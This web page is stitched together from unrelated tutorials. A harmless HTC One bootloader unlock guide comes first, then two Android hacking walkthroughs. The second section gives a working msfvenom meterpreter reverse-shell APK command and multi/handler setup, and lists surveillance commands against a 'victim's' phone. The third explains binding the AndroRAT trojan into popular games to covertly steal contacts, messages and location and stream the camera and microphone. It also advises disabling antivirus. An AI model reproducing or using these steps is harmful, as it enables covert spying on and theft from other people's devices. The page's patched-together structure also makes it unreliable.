How to unlock Htc Bootloader

Unlock HTC Bootloader

Unlocking the bootloader of your HTC One smartphone will allow you to root and install new custom ROMs. This is a guide that should be used by those users who want to tinker with their phone’s OS and free its OS so that you will be able to flash unofficial software for your phone. In order to make sure that you successfully complete this guide, you will need to read the guidelines below before starting the bootloader unlock process. Here’s what you need to know:

1. use this guide only with the HTC One smartphone. Do not attempt to unlock any other Android device using the instructions listed in this post.
2. If you unlock the bootloader of your HTC One you will lose all the data that is currently stored on it. Every single file will be wiped and you cannot retrieve it.
3. Move all your important files to your computer using the USB data cable.
4. The phone’s warranty will be voided after the bootloader is unlocked.
5. Enable USB debugging option from the Android Developer Options. NOTE: If the Developer Options menu doesn’t appear, then you should open Settings, then About Phone and after that you should tap 7 times on the ‘Build Number’ area. It will unlock the Developer Options for your smartphone.
6. If, after you unlock the bootloader, you will receive any new software updates, then you will have to deny their installation as you will end up bricking the phone after the install is complete.
7. Make sure to download and install the HTC Sync Manager before getting to the tutorial. Download link HERE.
8. Download Fastboot zip from HERE. Extract the zip contents into a folder named Fastboot. It would be great if you’d place the Fastboot folder on your PC desktop menu. It should feature 4 files within after the unzip is complete.
9. Disable all the antivirus applications from running on your computer. Such application are usually interfering with the Bootloader Unlock tools.
10. Make sure that your phone’s battery has enough power left so that it won’t power off during the process.
11. We cannot be blamed in case something goes wrong.

How to unlock the HTC bootloader:

We have put together a detailed step-by-step instructions guide on how to unlock bootloader of your HTC device. Please read every line carefully. We suggest, read the tutorial once before actually performing it on your phone.

IMPORTANT: Unlocking your device may void all or parts of your warranty by HTC.

Step 1 – Go to HTCDev.com website.

Step 2 – Click on ‘Register’ and create an account at the HTCDev website.

Step 3 – Activate your account. Login and go to main page of HTCDev.

Step 4 – Click on “Unlock Bootloader” button and click the “Get Started” button.

Step 5 – Select “All Other Supported Models” from the dropdown list and then click the “Begin Unlock Bootloader” button.

Step 6 – Carefully read the warning popup message and then press the ‘Yes’ button.

Step 7 – Check both the boxes in the Legal Terms popup box. Now press the “Proceed to Unlock Instructions” button.

Step 8 – Download Fastboot files if you don’t already have them and extract in C:\ drive.

Step 9 – Hold the Power button on your HTC device for 10 seconds to completely turn it off.

Step 10 – Now go to Bootloader Mode on your device. How? Press Volume Down and Power to start the device into Bootloader mode.

Step 11 – Use the Volume buttons to select up or down. Highlight Fastboot and press the Power button to select.

Step 12 – Connect your HTC device to the computer via a USB cable.

Step 13 – Now open Command Propmpt. How? Click the Start button and type ‘cmd’ (without quotes) and press Enter.

Step 14 – In the Command Prompt window, type the following command and press Enter.

cd c:\fastboot

Step 15 – Now type the following command and press Enter.

fastboot oem get_identifier_token

Step 16 – You will see a long string of text (identifier token). What to do now? Open this page on HTCDev.

Step 17 – Now follow the instructions as given there to select and copy text from Command Prompt.

Step 18 – Once copied, paste that identifiertoken into the box at the bottom of that HTCDev page and then click Submit.

Step 19 – You will receive an email by HTC (on the registered email) with a link to the second part of the instructions and your “Unlock_code.bin” file attached.

Step 20 – Download “Unlock_code.bin” and save it in your Fastboot folder (C:\fastbooot in our case).

Step 21 – Now type the following command in Command Prompt and press Enter.

fastboot flash unlocktoken Unlock_code.bin

Step 22 – Check your phone. Read on-screen instructions. Press Volume Up to accept and the Power button to confirm.

That’s it. Your HTC device now has a unlocked bootloader. This means, you can install custom ROMs, flash a custom recovery and perform other system tweaks on your HTC phone now.

How To Hack Any Android Device Using Kali Linux [MATHOD-2]

Msfvenom Is A Kali Linux Hacking Tool For Android ,Is A Combination Of Msfpayload And Msfencode, Putting Both Of These Tools Into A Single Framework Instance Known As Msfvenom Payload.

Hacking With METASPLOIT In Kali Linux Is A Old Tool. Metasploit Is Enhanced By Msfvenom In Kali Linux. Metasploit Is Now A Outdated Tool.

So, let's get started... !!!

Follow These Simple Steps :

1. Fire Up kali and open command terminal.

2. Set payload and create custom windows executable.

Command:

root@kali:-# msfvenom -p android/meterpreter/reverse_tcp  LHOST=192.168.0.110 LPORT=4444 R > andro.apk

(To know your LHOST, open new terminal and type ifconfig )

Your apk file is being saved in the Home folder.

Note: Don't add any stray space characters anywhere. Use the command as is (after changing the LHOST and LPORT as needed).

3. Transfer/mail this file (here andro.apk) file to the victim's phone and install it.

4. Start the metasploit framework console as follows :
       
Command :

root@kali:-# msfconsole

5. Now it's time to open and setup multi-handler. Follows the steps :

msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

        Payload Handler is being started........

6. When the victims clicks on the app(installed as MAIN ACTIVITY in the menu) in his phone, meterpreter session will be established.

7. Try the following exploit commands :
    - record_mic
    - webcam_snap
    - webcam_stream
    - dump_contacts
    - dump_sms
    - geolocate

Steps To follow :

• Open Signapk folder then open cmd.
• Copy the andro.apk(the app you made) in Signapk folder.
• Type java -" jar signapk.jar certificate.pem key.pk8 andro.apk andro-signed.apk "in cmd(not double quotes).
• copy it in your phone and install it.

HACKING ANY ANDROID DEVICE USING ANDRORAT APP BINDER

USUALLY any Android Device can be hacked using Metasploit Meterpreter attack but many people are not aware of that process as it is not user friendly. But using a simple tool called AndroRAT (Android Remote Administration Tool) it is possible for anyone to hack any Android device. By successfully running this tool one can retrieve following information from target Android device.

• Get contacts (and all theirs informations)
• Do vibrate the phone
• Get call logs
• Open an URL in the default browser
• Get all messages
• Send a text message
• Location by GPS/Network
• Do a toast
• Monitoring received messages in live
• Streaming video (for activity based client only)
• Monitoring phone state in live (call received, call sent, call missed..)
• Stream sound from microphone (or other sources..)
• Take a picture from the camera

You can do almost anything with this tool. All you need to do is to install a simple application on target Android device. This application is generated by AndroRAT tool which further can be binded(joined) with any android application for stealth(Anonymity). Once you have installed the deploy package(.apk) on Android device you can control the device anonymously through a user-friendly GUI.

Things you'll need: 

• AndroRAT (Android Remote Administration Tool), download here.
• (Please Turn off Anti-virus and Windows defender, this zip file is not virus but the anti-virus alerts it as virus because it is a Hacking Software). 


• Router Port Forwarder (Only if you are using a wireless router), download fromhere.
• An Android device to test the deploy package.
• A good internet connection.
• Basic computer knowledge.
• A bit of patience.

Prerequisites(for wireless router users):

• Download the Router Port Forwarder tool from the above link.
• Install it on you PC and open it.
• The software automatically detects your router model number and displays it.
  
• Now in the "Port forwarding" tab click "Add".
  
• In the next window enter the name of the port as you like, leave the protocol astcp, enter the port you would like to open (Ex. 8080,1234,4444...).
• And finally the internal ip address.
• To know your internal IP address open Start > Run, and then enter ncpa.cpl, this opens active network connections.(you must be connected to the internet)
• Right click on the connected network and click status and then clickdetails.
• In the details windows check the Ipv4 address, it should be something like 192.168.XX.XX.
  
• Note the Ip address for further use. This is your internal ip address.

Note: You should check your internal ip only when you are connected to the internet.

Procedure to create a deploy package:

• Download the AndroRAT Zip and install it.
• Download any Android application like Temple run, Subway Surfers with which you would like to bind the hacking application.
• Open the extracted folder and then run the application AndroRat Binder.
• It should look like the below screenshot.
  
• Now in the Ip box enter your internal ip address which you have noted in the prerequisites.(If you don't know your ip address read prerequisites from step 7.)
• In the second box enter the port which you have opened in port forwarder tool (only wireless router users, other can enter the port whatever they like).
• In the third box, browse and select the target application with which you would like to bind the hacking application.
• Now hit 'Go' and wait for the AndroRat to build the deploy apk.
• Once the process completes you will find the result application in the same AndroRat folder.
• Now Install it one any Android device and open it.(Note that the device should have an active internet connection)

 Steps to control the Target Android Device:

• Once you have successfully installed the result apk that was generated by AndroRat, you can control the victim's Android device through a well designed GUI.
• In the AndroRat folder, again open the AndroRatfolder.
• In that folder you will find a java application named "AndroRat".
• When you open it for the first time, allow the firewall exception for the application.
  
• Now click server at the top and enter the port which you have opened before.
• Save it and restart the application. Now the application starts listening to the new port.
• In this application you will find the list of connected devices.
• Double click the device you would like to access and you see a window with full built-in controls.
  
• Note that the target device is listed as long as he is connected to the internet and is using the deploy application created by Androrat.

Note: 

• If the application does not work and no devices are listed in the AndroRat application, try building just the Hacking application instead of binding it other application.

• For the users who are using wireless routers, port forwarding is a must.
• Before trying it on others devices try it on your own Android first.
• Turn off the Anti-virus before extracting the AndroRat zip which you have downloaded.
• If possible turn off Firewall too.
• Make sure you have a Good internet connection.
